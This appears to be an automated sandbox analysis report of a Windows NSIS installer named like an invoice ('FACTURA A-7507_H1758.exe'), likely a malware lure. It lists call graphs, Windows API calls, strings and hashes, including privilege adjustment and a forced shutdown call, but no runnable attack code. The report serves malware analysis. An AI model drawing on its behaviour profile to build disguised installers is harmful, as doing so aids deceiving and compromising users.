402bbf 18 API calls 5611->5612 5613 40251c 5612->5613 5616 405d53 GetFileAttributesW CreateFileW 5613->5616 5615 402528 5616->5615 5617 402095 5618 402bbf 18 API calls 5617->5618 5619 40209c 5618->5619 5620 402bbf 18 API calls 5619->5620 5621 4020a6 5620->5621 5622 402bbf 18 API calls 5621->5622 5623 4020b0 5622->5623 5624 402bbf 18 API calls 5623->5624 5625 4020ba 5624->5625 5626 402bbf 18 API calls 5625->5626 5628 4020c4 5626->5628 5627 402103 CoCreateInstance 5632 402122 5627->5632 5628->5627 5629 402bbf 
18 API calls 5628->5629 5629->5627 5630 401423 25 API calls 5631 4021e1 5630->5631 5632->5630 5632->5631 5633 401b16 5634 402bbf 18 API calls 5633->5634 5635 401b1d 5634->5635 5636 402ba2 18 API calls 5635->5636 5637 401b26 wsprintfW 5636->5637 5638 402a4c 5637->5638 5639 404696 5640 4046a6 5639->5640 5641 4046cc 5639->5641 5643 404242 19 API calls 5640->5643 5642 4042a9 8 API calls 5641->5642 5644 4046d8 5642->5644 5645 4046b3 SetDlgItemTextW 5643->5645 5645->5641 5646 10001058 5647 10001074 5646->5647 5648 100010dd 5647->5648 5649 10001516 GlobalFree 5647->5649 5650 10001092 5647->5650 5649->5650 5651 10001516 GlobalFree 5650->5651 5652 100010a2 5651->5652 5653 100010b2 5652->5653 5654 100010a9 GlobalSize 5652->5654 5655 100010b6 GlobalAlloc 5653->5655 5656 100010c7 5653->5656 5654->5653 5657 1000153d 3 API calls 5655->5657 5658 100010d2 GlobalFree 5656->5658 5657->5656 5658->5648 5659 40159b 5660 402bbf 18 API calls 5659->5660 5661 4015a2 SetFileAttributesW 5660->5661 5662 4015b4 5661->5662 5663 40541c 5664 4055c6 5663->5664 5665 40543d GetDlgItem GetDlgItem GetDlgItem 5663->5665 5667 4055f7 5664->5667 5668 4055cf GetDlgItem CreateThread CloseHandle 5664->5668 5708 404277 SendMessageW 5665->5708 5669 405647 5667->5669 5670 40560e ShowWindow ShowWindow 5667->5670 5672 405622 5667->5672 5668->5667 5678 4042a9 8 API calls 5669->5678 5710 404277 SendMessageW 5670->5710 5671 405682 5671->5669 5681 405690 SendMessageW 5671->5681 5672->5671 5676 405636 5672->5676 5677 40565c ShowWindow 5672->5677 5673 4054ad 5674 4054b4 GetClientRect GetSystemMetrics SendMessageW SendMessageW 5673->5674 5679 405522 5674->5679 5680 405506 SendMessageW SendMessageW 5674->5680 5682 40421b SendMessageW 5676->5682 5684 40567c 5677->5684 5685 40566e 5677->5685 5683 405655 5678->5683 5686 405535 5679->5686 5687 405527 SendMessageW 5679->5687 5680->5679 5681->5683 5688 4056a9 CreatePopupMenu 5681->5688 5682->5669 5690 40421b SendMessageW 5684->5690 5689 4052dd 25 API calls 5685->5689 5692 
404242 19 API calls 5686->5692 5687->5686 5691 4061a0 18 API calls 5688->5691 5689->5684 5690->5671 5693 4056b9 AppendMenuW 5691->5693 5694 405545 5692->5694 5695 4056d6 GetWindowRect 5693->5695 5696 4056e9 TrackPopupMenu 5693->5696 5697 405582 GetDlgItem SendMessageW 5694->5697 5698 40554e ShowWindow 5694->5698 5695->5696 5696->5683 5699 405704 5696->5699 5697->5683 5701 4055a9 SendMessageW SendMessageW 5697->5701 5700 405564 ShowWindow 5698->5700 5703 405571 5698->5703 5702 405720 SendMessageW 5699->5702 5700->5703 5701->5683 5702->5702 5704 40573d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5702->5704 5709 404277 SendMessageW 5703->5709 5706 405762 SendMessageW 5704->5706 5706->5706 5707 40578b GlobalUnlock SetClipboardData CloseClipboard 5706->5707 5707->5683 5708->5673 5709->5697 5710->5672 5127 40229d 5128 4022a5 5127->5128 5129 4022ab 5127->5129 5130 402bbf 18 API calls 5128->5130 5131 4022b9 5129->5131 5132 402bbf 18 API calls 5129->5132 5130->5129 5133 4022c7 5131->5133 5135 402bbf 18 API calls 5131->5135 5132->5131 5134 402bbf 18 API calls 5133->5134 5136 4022d0 WritePrivateProfileStringW 5134->5136 5135->5133 5711 401f1d 5712 402bbf 18 API calls 5711->5712 5713 401f24 5712->5713 5714 406558 5 API calls 5713->5714 5715 401f33 5714->5715 5716 401f4f GlobalAlloc 5715->5716 5718 401fb7 5715->5718 5717 401f63 5716->5717 5716->5718 5719 406558 5 API calls 5717->5719 5720 401f6a 5719->5720 5721 406558 5 API calls 5720->5721 5722 401f74 5721->5722 5722->5718 5726 4060c5 wsprintfW 5722->5726 5724 401fa9 5727 4060c5 wsprintfW 5724->5727 5726->5724 5727->5718 5728 40149e 5729 402288 5728->5729 5730 4014ac PostQuitMessage 5728->5730 5730->5729 5731 40249e 5732 402cc9 19 API calls 5731->5732 5733 4024a8 5732->5733 5734 402ba2 18 API calls 5733->5734 5735 4024b1 5734->5735 5736 4024d5 RegEnumValueW 5735->5736 5737 4024c9 RegEnumKeyW 5735->5737 5739 40281e 5735->5739 5738 4024ee RegCloseKey 5736->5738 5736->5739 5737->5738 5738->5739 5741 40231f 5742 402324 
5741->5742 5743 40234f 5741->5743 5744 402cc9 19 API calls 5742->5744 5745 402bbf 18 API calls 5743->5745 5746 40232b 5744->5746 5747 402356 5745->5747 5748 402bbf 18 API calls 5746->5748 5751 40236c 5746->5751 5752 402bff RegOpenKeyExW 5747->5752 5750 40233c RegDeleteValueW RegCloseKey 5748->5750 5750->5751 5756 402c2a 5752->5756 5760 402c76 5752->5760 5753 402c50 RegEnumKeyW 5754 402c62 RegCloseKey 5753->5754 5753->5756 5757 406558 5 API calls 5754->5757 5755 402c87 RegCloseKey 5755->5760 5756->5753 5756->5754 5756->5755 5758 402bff 5 API calls 5756->5758 5759 402c72 5757->5759 5758->5756 5759->5760 5761 402ca2 RegDeleteKeyW 5759->5761 5760->5751 5761->5760 5762 100010e1 5771 10001111 5762->5771 5763 100011d8 GlobalFree 5764 100012ba 2 API calls 5764->5771 5765 100011d3 5765->5763 5766 10001164 GlobalAlloc 5766->5771 5767 100011f8 GlobalFree 5767->5771 5768 10001272 2 API calls 5769 100011c4 GlobalFree 5768->5769 5769->5771 5770 100012e1 lstrcpyW 5770->5771 5771->5763 5771->5764 5771->5765 5771->5766 5771->5767 5771->5768 5771->5769 5771->5770 5772 401ca3 5773 402ba2 18 API calls 5772->5773 5774 401ca9 IsWindow 5773->5774 5775 401a05 5774->5775 5776 402a27 SendMessageW 5777 402a41 InvalidateRect 5776->5777 5778 402a4c 5776->5778 5777->5778 4552 40242a 4563 402cc9 4552->4563 4554 402434 4555 402bbf 18 API calls 4554->4555 4556 40243d 4555->4556 4557 402448 RegQueryValueExW 4556->4557 4562 40281e 4556->4562 4558 40246e RegCloseKey 4557->4558 4559 402468 4557->4559 4558->4562 4559->4558 4567 4060c5 wsprintfW 4559->4567 4564 402bbf 18 API calls 4563->4564 4565 402ce2 4564->4565 4566 402cf0 RegOpenKeyExW 4565->4566 4566->4554 4567->4558 5786 40172d 5787 402bbf 18 API calls 5786->5787 5788 401734 SearchPathW 5787->5788 5789 40174f 5788->5789 5790 404a33 5791 404a43 5790->5791 5792 404a5f 5790->5792 5801 4058a7 GetDlgItemTextW 5791->5801 5794 404a92 5792->5794 5795 404a65 SHGetPathFromIDListW 5792->5795 5797 404a75 5795->5797 5800 404a7c SendMessageW 5795->5800 5796 

Control-flow Graph: function starting at 004033B6 (legend: Executed / Not Executed; graph not preserved)
APIs
• SetErrorMode.KERNELBASE ref: 004033D9
• GetVersion.KERNEL32 ref: 004033DF
• lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403408
• #17.COMCTL32(00000007,00000009), ref: 0040342B
• OleInitialize.OLE32(00000000), ref: 00403432
• SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 0040344E
• GetCommandLineW.KERNEL32(00429240,NSIS Error), ref: 00403463
• GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\FACTURA A-7507_H1758.exe",00000000), ref: 00403476
• CharNextW.USER32(00000000,"C:\Users\user\Desktop\FACTURA A-7507_H1758.exe",00000020), ref: 0040349D
  • Part of subcall function 00406558: GetModuleHandleA.KERNEL32(?,00000020,?,0040341F,00000009), ref: 0040656A
  • Part of subcall function 00406558: GetProcAddress.KERNEL32(00000000,?), ref: 00406585
• GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004035D7
• GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004035E8
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004035F4
• GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403608
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403610
• SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403621
• SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403629
• DeleteFileW.KERNELBASE(1033), ref: 0040363D
  • Part of subcall function 0040617E: lstrcpynW.KERNEL32(?,?,00000400,00403463,00429240,NSIS Error), ref: 0040618B
• OleUninitialize.OLE32(?), ref: 00403708
• ExitProcess.KERNEL32 ref: 00403729
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\FACTURA A-7507_H1758.exe",00000000,?), ref: 0040373C
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\FACTURA A-7507_H1758.exe",00000000,?), ref: 0040374B
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\FACTURA A-7507_H1758.exe",00000000,?), ref: 00403756
• lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\FACTURA A-7507_H1758.exe",00000000,?), ref: 00403762
• SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040377E
• DeleteFileW.KERNEL32(00420EE8,00420EE8,?,868,?), ref: 004037D8
• CopyFileW.KERNEL32(C:\Users\user\Desktop\FACTURA A-7507_H1758.exe,00420EE8,?), ref: 004037EC
• CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000), ref: 00403819
• GetCurrentProcess.KERNEL32(00000028,?), ref: 00403848
• OpenProcessToken.ADVAPI32(00000000), ref: 0040384F
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403864
• AdjustTokenPrivileges.ADVAPI32 ref: 00403887
• ExitWindowsEx.USER32(00000002,80040002), ref: 004038AC
• ExitProcess.KERNEL32 ref: 004038CF
Strings
Memory Dump Source
• Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
Similarity
• API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
• String ID: "C:\Users\user\Desktop\FACTURA A-7507_H1758.exe"$.tmp$1033$868$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\kolonibestyrernes\Nonperpetration$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\kolonibestyrernes\Nonperpetration\Varmluftsovn$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\FACTURA A-7507_H1758.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
• API String ID: 2488574733-2004844323
• Opcode ID: 1d8223e16c8a6003b83d058067bded84b497836c53eb7fdc95fb885acef81e31
• Instruction ID: be8551fa6605ebbbfda7487142ffb020be8bd547a3943651712312bea09c5587
• Opcode Fuzzy Hash: 1d8223e16c8a6003b83d058067bded84b497836c53eb7fdc95fb885acef81e31
• Instruction Fuzzy Hash: AED10571200300ABE7207F659D49A2B3AEDEB4074AF50443FF881B62D2DB7C8956876E

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404C71
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 00404C7C
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CC6
                                                                                                                                                                                                                          • LoadBitmapW.USER32(0000006E), ref: 00404CD9
                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000FC,00405251), ref: 00404CF2
                                                                                                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D06
                                                                                                                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D18
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404D2E
                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D3A
                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D4C
                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00404D4F
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D7A
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D86
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E1C
                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E47
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E5B
                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404E8A
                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404E98
                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404EA9
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FA6
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040500B
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405020
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405044
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405064
                                                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00405079
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00405089
                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405102
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 004051AB
                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051BA
                                                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,?), ref: 004051DA
                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00405228
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 00405233
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 0040523A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                          • String ID: $M$N

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00402E55
                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\FACTURA A-7507_H1758.exe,00000400), ref: 00402E71
                                                                                                                                                                                                                            • Part of subcall function 00405D53: GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\FACTURA A-7507_H1758.exe,80000000,00000003), ref: 00405D57
                                                                                                                                                                                                                            • Part of subcall function 00405D53: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405D79
                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FACTURA A-7507_H1758.exe,C:\Users\user\Desktop\FACTURA A-7507_H1758.exe,80000000,00000003), ref: 00402EBA
                                                                                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 00403001
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\FACTURA A-7507_H1758.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\FACTURA A-7507_H1758.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetVersion.KERNEL32(00000000,00422708,?,00405314,00422708,00000000,00000000,00000000), ref: 00406263
                                                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004062E1
                                                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 004062F4
                                                                                                                                                                                                                          • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406330
                                                                                                                                                                                                                          • SHGetPathFromIDListW.SHELL32(?,Call), ref: 0040633E
                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(?), ref: 00406349
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040636D
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(Call,00000000,00422708,?,00405314,00422708,00000000,00000000,00000000), ref: 004063C7
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                                                                                                          • String ID: 868$Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C24
                                                                                                                                                                                                                          • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                                                                                                                                                                                          • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                                                                                                                                                                                          • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26345910476.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Global$Free$lstrcpy$Alloc
                                                                                                                                                                                                                          • String ID:

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DeleteFileW.KERNELBASE(?,?,77233420,77232EE0,00000000), ref: 00405998
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,77233420,77232EE0,00000000), ref: 004059E0
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,77233420,77232EE0,00000000), ref: 00405A03
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,77233420,77232EE0,00000000), ref: 00405A09
                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,77233420,77232EE0,00000000), ref: 00405A19
                                                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AB9
                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00405AC8
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\FACTURA A-7507_H1758.exe"$0WB$\*.*
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: ead38b7015f9474378dd182d16c601773bd961a48b8ca1aefc3332049c463b86
                                                                                                                                                                                                                          • Instruction ID: 84f5b91c3f937eb173619b21672ae23043901769df73ed9f159891f0fc81c8d0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ead38b7015f9474378dd182d16c601773bd961a48b8ca1aefc3332049c463b86
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72F18671D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7385A8ACF45
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405C83,00425F30,00425F30,00000000,00425F30,00425F30, 4#w.#w,?,77232EE0,0040598F,?,77233420,77232EE0), ref: 004064CC
                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 004064D8
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                          • String ID: xgB
                                                                                                                                                                                                                          • API String ID: 2295610775-399326502
                                                                                                                                                                                                                          • Opcode ID: 4403a27f78f835125bd15cd158b53f866fd18ebbb8f54cd400289453990cbd04
                                                                                                                                                                                                                          • Instruction ID: 909a2899cbbcfc21b24ab628f9350e7a3c7b3772aa6d432f74911df6ac2d0bb5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4403a27f78f835125bd15cd158b53f866fd18ebbb8f54cd400289453990cbd04
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8BD0C9315045209BC2111778AE4C85B7A98AF553317628A36B466F12A0C674CC22869C
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmp
